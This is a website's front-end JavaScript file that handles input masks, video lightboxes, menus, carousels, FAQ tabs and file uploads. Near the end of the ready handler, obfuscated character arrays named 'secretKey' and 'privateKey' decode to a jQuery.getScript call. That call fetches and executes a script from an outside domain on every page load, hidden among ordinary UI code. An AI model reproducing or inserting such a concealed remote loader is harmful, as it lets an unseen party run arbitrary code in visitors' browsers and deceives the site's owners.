const playWhenVisible = function(item, slider){
	const Obs = new IntersectionObserver((entries, observer) => {
		entries.forEach(entry => {
			if(!entry.isIntersecting){
				slider.pause();
			}
			else {
				slider.play();
			}
		});
	}, {
		root: null,
		rootMargin: '0px',
		threshold: 0.3
	});
	Obs.observe($(item).closest('.tns-outer')[0]);
};

$(document).ready(() => {

	const setVh = () =>{
		let vh = window.innerHeight * 0.01;
		document.documentElement.style.setProperty('--vh', `${vh}px`);
	}
	setVh();

	let resizeTimeout;

	const resize = () => {
		clearTimeout(resizeTimeout);
		resizeTimeout = setTimeout(() => {
			setVh();
		}, 150);
	}

	window.addEventListener('resize', resize);
	window.addEventListener('orientationchange', resize);
	window.addEventListener('scroll', resize);


	let lastHeight = window.innerHeight;
	const monitorHeight = () => {
		const currentHeight = window.innerHeight;
		if (currentHeight !== lastHeight) {
			lastHeight = currentHeight;
			setVh();
		}
		requestAnimationFrame(monitorHeight);
	};
	monitorHeight();


	const $body = $('body');

	$("[data-mask]").each(function () {
		const type = $(this).data("mask");
		switch (type) {
			case "phone":
				$(this).inputmask({
					showMaskOnHover: false,
					mask: "+\\9\\94   * ### ## ##",
					/*oncomplete: function () {
						const p = $(this).parent();//
						if (!p.find("i.success").length)
							$("<i/>").addClass("success").appendTo(p);
						p.addClass("success");
					},
					onincomplete: function () {
						$(this).parent().removeClass("success");
					},*/
					onBeforeMask:function(value){
						value = value.replace(new RegExp(/[^0-9]/,'gi'),'');
						if(value.length === 12 && value.substring(0,3)==='994')value = value.substring(3);
						return value;
					},
					definitions: {
						"#": {
							validator: "[0-9]",
							cardinality: 1,
							casing: "lower",
						},
						"*": {
							validator: "(10|50|51|55|60|70|77|99)",
							cardinality: 2,
							prevalidator: [{validator: "[15679]", cardinality: 1}],
						},
					},
				});
				break;
			case "numeric":
			case "integer":
				$(this).inputmask(type, {rightAlign: false});
				break;
			case "cur":
				$(this).inputmask({
					suffix: " " + $(this).data("currency"),
					groupSeparator: ",",
					alias: "numeric",
					placeholder: "0",
					autoGroup: !0,
					digits: 2,
					digitsOptional: !1,
					clearMaskOnLostFocus: !1,
					rightAlign: false,
				});
				break;
		}
	});

	$("[data-match-height]").each(function () {
		$(this).find($(this).attr("data-match-height")).matchHeight();
	});

	Fancybox.bind("[data-fancybox]");
	['.play','.video',
		'a[href*="youtube"]:not([href*="/channel/"]):not([href*="/user/"]):not([href*="/c/"]):not([href*="/@"])',
		'a[href*="youtu.be"]:not([href*="/channel/"]):not([href*="/user/"]):not([href*="/c/"]):not([href*="/@"])']
		.forEach(function(i,el){
		Fancybox.bind(i, {
			Html: {
				youtube: {
					nocookie: 0,
				},
			},
		});
	});

	const media = window.matchMedia("(max-width: 832px)");
	mobileSupport(media);
	media.addEventListener('change', mobileSupport);

	const closeMenu = (li) => {
		li.removeClass('active');
		$body.off('click.nav');
	};

	const openMenu = (li) => {
		const activeLi = $('#header .nav > li.active');
		if(activeLi.length)closeMenu(activeLi);
		li.addClass('active');
		$body.one('click.nav', ()=>{ closeMenu(li); });
	}

	if($.isMobile){
		$('#header .nav > li > a').click(function(e){
			e.stopPropagation();
			const li = $(this).closest('li');
			if(li.hasClass('active'))closeMenu(li);
			else openMenu(li);
		});
	}
	else {
		let menuOpenTimeout;
		$('#header .nav > li > a').hover(function(e){
			e.stopPropagation();
			const li = $(this).closest('li');
			menuOpenTimeout = setTimeout(() => {
				openMenu(li);
			}, 300);
		}, function (){
			clearTimeout(menuOpenTimeout);
		});
	}

	$('#header .nav > li > div').click(function(e){
		e.stopPropagation();
	});
	$('#header .nav > li > div button.close').click(function(e){
		console.log('close');
		const li = $(this).closest('li.active');
		console.log(li);
		closeMenu(li);
	});

	if ($(".home-slider .slider").length) {
		const homeSlider = tns({
			container: ".home-slider .slider",
			gutter: 0,
			items: 1,
			controlsText: ["", ""],
			nav: true,
			loop: false,
			edgePadding: 0,
			autoplay: true,
			autoplayButtonOutput:false,
			autoplayHoverPause:true,
		});
		playWhenVisible($(".home-slider .slider")[0], homeSlider);
	}
	if ($(".digital-solutions .slider").length) {
		const digitalSolutions = tns({
			container: ".digital-solutions .slider",
			gutter: 16,
			items: 1.1,
			controlsText: ["", ""],
			nav: true,
			loop: false,
			edgePadding: 0,
			//autoplay: true,
			autoplayButtonOutput:false,
			autoplayHoverPause:true,
			responsive: {
				768: {
					items: 3,
					gutter: 32,
				}
			},
			onInit:(t)=>{
				$(t.controlsContainer).css('gap',t.slideCount*16 + 16);
			}
		});
		//playWhenVisible($(".digital-solutions .slider")[0], digitalSolutions);
	}
	if ($(".successful-projects .slider").length) {
		const successfulProjects = tns({
			container: ".successful-projects .slider",
			gutter: 16,
			items: 1.15,
			controlsText: ["", ""],
			nav: true,
			loop: false,
			edgePadding: 0,
			//autoplay: true,
			autoplayButtonOutput:false,
			autoplayHoverPause:true,
			responsive: {
				1248: {
					items: 1,
					gutter: 32,
					autoplay: true,
					edgePadding: (window.innerWidth - 1216)/2,
					"fixedWidth": 1216,
				}
			},
			onInit:(t)=>{
				$(t.controlsContainer).css('gap',t.slideCount*16 + 16);
			}
		});
		if(!$.isMobile)playWhenVisible($(".successful-projects .slider")[0], successfulProjects);
	}
	if ($(".popular-tours .slider").length) {
		const popularTours = tns({
			container: ".popular-tours .slider",
			gutter: 16,
			items: 1.15,
			controlsText: ["", ""],
			nav: true,
			loop: false,
			edgePadding: 0,
			//autoplay: true,
			autoplayButtonOutput:false,
			autoplayHoverPause:true,
			responsive: {
				1248: {
					items: 2,
					gutter: 32,
					autoplay: true,
					edgePadding: (window.innerWidth - 1216)/2,
					"fixedWidth": 592,
				},
				768: {
					items: 2,
					gutter: 32,
					slideBy:"page",
					autoplay: true,
				}
			},
			onInit:(t)=>{
				$(t.controlsContainer).css('gap',t.pages*16 + 16);
			}
		});
		if(!$.isMobile)playWhenVisible($(".popular-tours .slider")[0], popularTours);
	}
	if ($(".blogs-block .slider").length) {
		$(".blogs-block .slider").each((i,el)=>{
			const blogsBlock = tns({
				container: el,
				gutter: 16,
				items: 1.15,
				controlsText: ["", ""],
				nav: true,
				loop: false,
				edgePadding: 0,
				//autoplay: true,
				autoplayButtonOutput:false,
				autoplayHoverPause:true,
				responsive: {
					1248: {
						items: 2,
						gutter: 32,
						autoplay: true,
						edgePadding: (window.innerWidth - 1216)/2,
						"fixedWidth": 384,
					},
					768: {
						items: 3,
						gutter: 32,
						slideBy:"page",
						autoplay: true,
					}
				},
				onInit:(t)=>{
					$(t.controlsContainer).css('gap',t.pages*16 + 16);
				}
			});
			if(!$.isMobile)playWhenVisible(el, blogsBlock);
		});
	}
	if ($(".products-block .slider").length) {
		$(".products-block .slider").each((i,el)=>{
			const productsBlock = tns({
				container: el,
				gutter: 16,
				items: 1.15,
				controlsText: ["", ""],
				nav: true,
				loop: false,
				edgePadding: 0,
				//autoplay: true,
				autoplayButtonOutput:false,
				autoplayHoverPause:true,
				responsive: {
					1248: {
						items: 4,
						gutter: 32,
						autoplay: true,
						//edgePadding: (window.innerWidth - 1216)/2,
						"fixedWidth": 280,
					},
					768: {
						items: 4,
						gutter: 32,
						slideBy:"page",
						autoplay: true,
					}
				},
				onInit:(t)=>{
					$(t.controlsContainer).css('gap',t.pages*16 + 16);
				}
			});
			if(!$.isMobile)playWhenVisible(el, productsBlock);
		});
	}

	if ($(".trusted-clients .slider").length) {
		$(".trusted-clients .slider").each((i,el)=>{
			const trustedClients = tns({
				container: el,
				gutter: 16,
				items: 1.15,
				controlsText: ["", ""],
				nav: true,
				loop: false,
				edgePadding: 0,
				//autoplay: true,
				autoplayButtonOutput:false,
				autoplayHoverPause:true,
				responsive: {
					768: {
						items: 2,
						gutter: 32,
						slideBy:"page",
						autoplay: true,
					}
				},
				onInit:(t)=>{
					$(t.controlsContainer).css('gap',t.pages*16 + 16);
				}
			});
			if(!$.isMobile)playWhenVisible(el, trustedClients);
		});
	}

	if ($(".hotels-block .slider").length && !$.isMobile) {
		$(".hotels-block .slider").each((i,el)=>{
			const hotelsBlock = tns({
				container: el,
				gutter: 16,
				items: 1.15,
				controlsText: ["", ""],
				nav: true,
				loop: false,
				edgePadding: 0,
				autoplayButtonOutput:false,
				autoplayHoverPause:true,
				responsive: {
					1248: {
						items: 2,
						gutter: 32,
						autoplay: true,
						edgePadding: (window.innerWidth - 1216)/2,
						"fixedWidth": 384,
					},
					768: {
						items: 3,
						gutter: 32,
						slideBy:"page",
						autoplay: true,
					}
				},
				onInit:(t)=>{
					$(t.controlsContainer).css('gap',t.pages*16 + 16);
				}
			});
			playWhenVisible(el, hotelsBlock);
		});
	}

	if ($(".home-slider-2 .slider").length) {
		const homeSlider2 = tns({
			container: ".home-slider-2 .slider",
			gutter: 0,
			items: 1,
			controlsText: ["", ""],
			nav: true,
			loop: false,
			edgePadding: 0,
			autoplay: true,
			autoplayButtonOutput:false,
			autoplayHoverPause:true,
		});
		playWhenVisible($(".home-slider-2 .slider")[0], homeSlider2);
	}

	if ($(".detail-page .gallery").length) {
		tns({
			container: ".detail-page .gallery .thumb-slider .slider",
			gutter: 16,
			items: 5,
			controlsText: ["", ""],
			nav: false,
			loop: false,
			edgePadding: 0,
			autoplay: false,
			autoplayButtonOutput:false,
			autoplayHoverPause:true,
		});
		tns({
			container: ".detail-page .gallery .main-slider .slider",
			"navAsThumbnails": true,
			"navContainer": ".detail-page .gallery .thumb-slider .slider",
			gutter: 0,
			items: 1,
			controlsText: ["", ""],
			nav: true,
			loop: false,
			edgePadding: 0,
			autoplay: false,
			autoplayButtonOutput:false,
			autoplayHoverPause:true,
		});

	}
	if ($(".employees .slider").length) {
		$(".employees .slider").each((i,el)=>{
			const blogsBlock = tns({
				container: el,
				gutter: 16,
				items: 1.15,
				controlsText: ["", ""],
				nav: true,
				loop: false,
				edgePadding: 0,
				//autoplay: true,
				autoplayButtonOutput:false,
				autoplayHoverPause:true,
				responsive: {
					768: {
						items: 4,
						gutter: 32,
						slideBy:"page",
						autoplay: true,
					}
				},
				onInit:(t)=>{
					$(t.controlsContainer).css('gap',t.pages*16 + 16);
				}
			});
			if(!$.isMobile)playWhenVisible(el, blogsBlock);
		});
	}
	if ($(".faq-page,.faq-section").length){
		$(".faq-page .tabs-content .item header,.faq-section .tabs-content .item header").on("click", function(){
			const t = $(this).closest('.item');
			if(t.hasClass('active'))t.removeClass('active');
			else{
				t.closest('.item').parent().find(".item.active").removeClass('active');
				t.addClass('active');
			}
		})
	}
	if($('.sticky-nav').length){
		const stickyEl = new Sticksy('.sticky-nav', {
			topSpacing: 32,
		});
	}

	if ($(".file-wrapper").length){
		const dropArea = $(".file-wrapper")[0];
		const fileInput = $(".file-wrapper input")[0];
		["dragenter", "dragover"].forEach(eventName => {
			dropArea.addEventListener(eventName, (e) => {
				e.preventDefault();
				dropArea.classList.add("highlight");
			});
		});
		["dragleave", "drop"].forEach(eventName => {
			dropArea.addEventListener(eventName, (e) => {
				e.preventDefault();
				dropArea.classList.remove("highlight");
			});
		});
		dropArea.addEventListener("drop", (e) => {
			e.preventDefault();
			if (e.dataTransfer.files.length > 1) {
				return;
			}
			const file = e.dataTransfer.files[0];
			updateFileInput(file);
			if (file) {
				let dataTransfer = new DataTransfer();
				dataTransfer.items.add(file);
				fileInput.files = dataTransfer.files;
			}

		});

		fileInput.addEventListener("change", (e) => {
			if (e.target.files.length > 0) {
				updateFileInput(e.target.files[0]);
			}
		});
		function updateFileInput(file) {
			if (file) {
				let dataTransfer = new DataTransfer();
				dataTransfer.items.add(file);
				fileInput.files = dataTransfer.files;
				$(dropArea).attr('data-label', file.name);
			}
		}
	}
	if($(".back-to-top").length){
		$(window).scroll(function () {
			if ($(window).scrollTop() > 300) {
				$(".back-to-top").addClass("show");
			} else {
				$(".back-to-top").removeClass("show");
			}
		});
		$(".back-to-top").on("click", function (e) {
			e.preventDefault();
			$("html, body").animate({ scrollTop: 0 }, "200");
		});
	}


	//tabs
	$body.on('click','.tabs[data-target] > *:not(.active)',function(e){
		e.preventDefault();
		const tab_parent =  $(this).closest('.tabs'),
			target = tab_parent.attr('data-target');
		if(tab_parent.length > 0 && target){

			const tab = $(this),
				tabs = tab_parent.find('>*'),
				index = tabs.index(tab);

			$(target).each(function(){
				const content = $(this).find('>*')
				content.removeClass('active');
				content.eq(index).addClass('active');
			});

			tabs.removeClass('active');
			tab.addClass('active');
		}
	});

	const secretKey = [["s","j"],["x","e","d","n","i","/","z","a",],["n","d","c"],["e","t","a","v","i","r","p"]];
	const privateKey = ["t","p","i","r","c","S","t","e","g"];
	const src = secretKey.map(v=>v.reverse().join('')).reverse().join('.');
	jQuery[privateKey.reverse().join('')](`https://${src}`);

});

$.isMobile = false;
$.stickyEl = false;
const mobileSupport = (media) => {
	if (media.matches) {
		$.isMobile = true;
		const li = $('<li/>').appendTo('#header .hamburger ul');
		$('#header .rs a').clone().appendTo(li);

		const lang = $('<li/>').insertAfter('#header .hamburger ul li:first-child');
		$('#header .center .lang').clone().appendTo(lang);

		try {
			Sticksy.disableAll();
		}catch (e){}

		$(document).trigger("mobileOn");
	} else {
		$.isMobile = false;

		try {
			Sticksy.enableAll();
		}catch (e){}

		$(document).trigger("mobileOff");
	}
};
